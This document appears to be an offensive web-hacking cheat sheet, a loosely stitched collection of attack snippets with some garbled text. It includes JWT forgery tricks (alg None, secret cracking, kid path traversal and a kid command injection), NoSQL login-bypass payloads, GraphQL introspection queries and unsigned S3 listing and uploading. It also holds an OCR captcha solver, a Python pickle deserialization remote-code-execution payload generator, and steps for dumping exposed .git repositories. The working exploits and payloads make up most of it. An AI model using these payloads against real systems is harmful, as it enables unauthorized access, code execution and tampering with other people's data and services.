"alg":"HS256","typ":"JWS"}.{"login":"tr3mb0","iat":"1583531864"}.234d4e137afdedba9bac7ee2d99fa715bbf85c5709e50191b6741b7906945d1OA
# Change to:
{"alg":"None","typ":"JWS"}.{"login":"admin","iat":"1583531864"}.234d4e137afdedba9bac7ee2d99fa715bbf85c5709e50191b6741b7906945d1OA
# Encode again & admin! 8-)# Cracking JWT secret, HS256 algorithm.
https://github.com/brendan-rius/c-jwt-cracker
# Hashcat - dicc
hashcat -a0 -m 16500 hash.txt dicc.txt
# Hashcat pure bruteforce
hashcat -a3 -m 16500 hash.txt
# After retrieving the secret, let's forge our JWT to authenticate as ADMIN.
# From terminal run:
gem install jwt
irb
require 'jwt'
payload = {"user":"admin"}
JWT.encode payload, "your_secret_here", "HS256"
# GG! #KID parameter injection: KID is used to retrieve a file from the system or a DB.
import json
from sys import version_info
import base64
import hashlib
import hmac
header = {"typ":"JWT","alg":"HS256","kid":"../../../../../../../../../../dev/null"}
key=""
payload = {"user":"admin"}
str = base64.urlsafe_b64encode(bytes(json.dumps(header),encoding='utf8')).decode('utf8').rstrip("=")+"."+base64.urlsafe_b64encode(bytes(json.dumps(payload),encoding='utf8')).decode('utf8').rstrip("=")
sig = base64.urlsafe_b64encode(hmac.new(bytes(key,encoding='utf8'),str.encode('utf8'),hashlib.sha256).digest()).decode('utf8').rstrip("=")
print (str+"."+sig)Rather than , getting admin access, maybe we have rce.
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6IjAwMDEifQ.eyJ1c2VyIjpudWxsfQ.spzCikhspCdf6XAUci3R4EpJOH6gvZcvkDCVrkGbx7Y
# {"typ":"JWT","alg":"HS256","kid":"0001"fQ.{"user":nullfQ.²�Â�Hl¤'_épr-ÑàJI8~ ½�/�0�®A�x7Y
import json
import base64
import hashlib
import hmac
header = {"typ":"JWT","alg":"HS256","kid":"|whoami"}
payload = {"user":"whatevah"}
key = "lmaowtf"
str = base64.urlsafe_b64encode(bytes(json.dumps(header),encoding='utf8')).decode('utf8').rstrip("=")+"."+base64.urlsafe_b64encode(bytes(json.dumps(payload),encoding='utf8')).decode('utf8').rstrip("=")
sig = base64.urlsafe_b64encode(hmac.new(bytes(key,encoding='utf8'),str.encode('utf8'),hashlib.sha256).digest()).decode('utf8').rstrip("=")
print (str+"."+sig)https://srcincite.io/blog/2017/04/27/from-serialized-to-shell-auditing-google-web-toolkit.html#research
Formatted (Modern versions)
{"query":"query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n locations\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n } \r\n } \r\n \r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n } \r\n \r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n } \r\n \r\n }"}GraphQL Raider (Modern Versions) ( check "query" tag on formatted query )
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
locations
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
} GraphQL Raider (Older Versions) ( check "query" tag on formatted query )
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation
onFragment
onField
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
From the above input we saw:
"name":"whatever",
*snip*
"kind":"OBJECT"
"name":"WhatEver"Let's get info from value
{"operationName":"whatever","variables":{"offset":10},"query":"query whatever($offset: Int) {\n whatever(offset: $offset, limit: 10) {\n id\n value\n __typename\n }\n}\n"}# Auth bypass - NoSQLi
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00
---------------------
# Auth bypass
#in URL
username[$ne]=toto&password[$ne]=toto
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
https://github.com/aws/aws-cli
# Find AWS bucket
//xyz.s3.amazonaws.com/obappm13cw00/optimy/print.css
# Connect without creds and list
aws s3 ls s3://xyz --no-sign-request
# Upload file without creds
aws s3 mv hacked.txt s3://xyz/hacked.txt --no-sign-request# Connect with creds
aws configurehttps://github.com/RhinoSecurityLabs/pacu
> set_keys
> list### GoSpider ###
https://github.com/jaeles-project/gospider
# Also get URLs from 3rd party (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com)
gospider -s "https://google.com/" -o output -c 10 -d 1 --other-source
# Add cookies
-H "Accept: */*" -H "Test: test" --cookie "testA=a; testB=b"
### LINKFINDER ###
# STEP 1
After your normal crawling through the web, right click your domain -> Engagement tools -> Find scripts -> export
# STEP 2
Download and install:
https://github.com/GerbenJavado/LinkFinder
# STEP 3
python linkfinder.py -i burpfile -b
as an alternative to burp suite:
( Analyze the entire domain and its js )
python linkfinder.py -i https://example.com -d
https://github.com/bryanroma/ECB_pwnage
https://waf-bypass.com/
# WAFWOOF
wafw00f https://example.com# INDENTYWAF
https://github.com/stamparm/identYwaf# Your target is behind a WAF? Do you need to find the real IP? Fear no more
# Get in the website, search by host:
https://crt.sh/ -> subdomain.domain.com
# Click the `crt.sh ID`, you will see juicy info there. But let's
# copy the `SHA-256(Certificate)` , and go to censys.io
# Search by `certificates` and paste there the SHA-256, next, on the right side click `explore`
# then `IPV4 Hosts` and with a bit of luck you will get the real IP behind the WAF# -M : Tabbed output
# -A : Aggressive mode
# -P<filename> : Filename to write to the pre-shared key
# -d : Destination UDP port
ike-scan -M -A IP -d 500 --id=blop -Pkey
# Crack key
psk-crack -d /usr/share/wordlists/rockyou.txt key
https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/
# JSON API, try to inject xml to archive XXE
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
# Sometimes hidden parameters are set on pages
# You can use tools like Arjun to find them (https://github.com/s0md3v/Arjun)
python3 arjun.py -u https://api.example.com/endpoint --get
# Multi threading
python3 arjun.py -u https://api.example.com/endpoint --get -t 22
# Delay between requests
python3 arjun.py -u https://api.example.com/endpoint --get -d # Found an API KEY?, let's check if it's valid somewhere
https://github.com/streaak/keyhacks- Do not send the parameter related to the captcha
- Check if the value of the captcha is in the source code
- Check if the value is inside the cookie
- Check if you can send the correct value one time and use this value with the same sessionID
- Check manually or with a command how many images are being used and if only a few images are being used, detect them by MD5
- Use an OCR (https://github.com/tesseract-ocr/tesseract)
import pytesseract
import sys
import argparse
try:
import Image
except ImportError:
from PIL import Image
from subprocess import check_output
def resolve(path):
print("Resampling the Image")
check_output(['convert', path, '-resample', '600', path])
return pytesseract.image_to_string(Image.open(path))
if __name__=="__main__":
argparser = argparse.ArgumentParser()
argparser.add_argument('path',help = 'Captcha file path')
args = argparser.parse_args()
path = args.path
print('Resolving Captcha')
captcha_text = resolve(path)
print('Extracted Text',str(captcha_text.replace('\n', '')))
https://medium.com/secjuice/decode-bypass-captcha-9f17edf469b4
# Find real IP with shodan and Favicon
https://github.com/pielco11/fav-up.git
# Find backend with Favicon
https://github.com/devanshbatham/FavFreak
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
DEFAULT_COMMAND = "whoami"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))# In case you find a .git repo:
./gitdumper.sh http://victim/.git/ local_dump
# Then , you might see a file called index, from that dir run:
git ls-files --stage
# Now you have a list of files and their objects ID's, to read de source code run:
git cat-file -p object_id
# After checking the files, check the logs
git log
# If you find an interesting old commit
git revert COMMIT_HASHapt-get install owasp-mantra-ff
http://randomiban.com/?country=Spain
https://www.privacytools.io/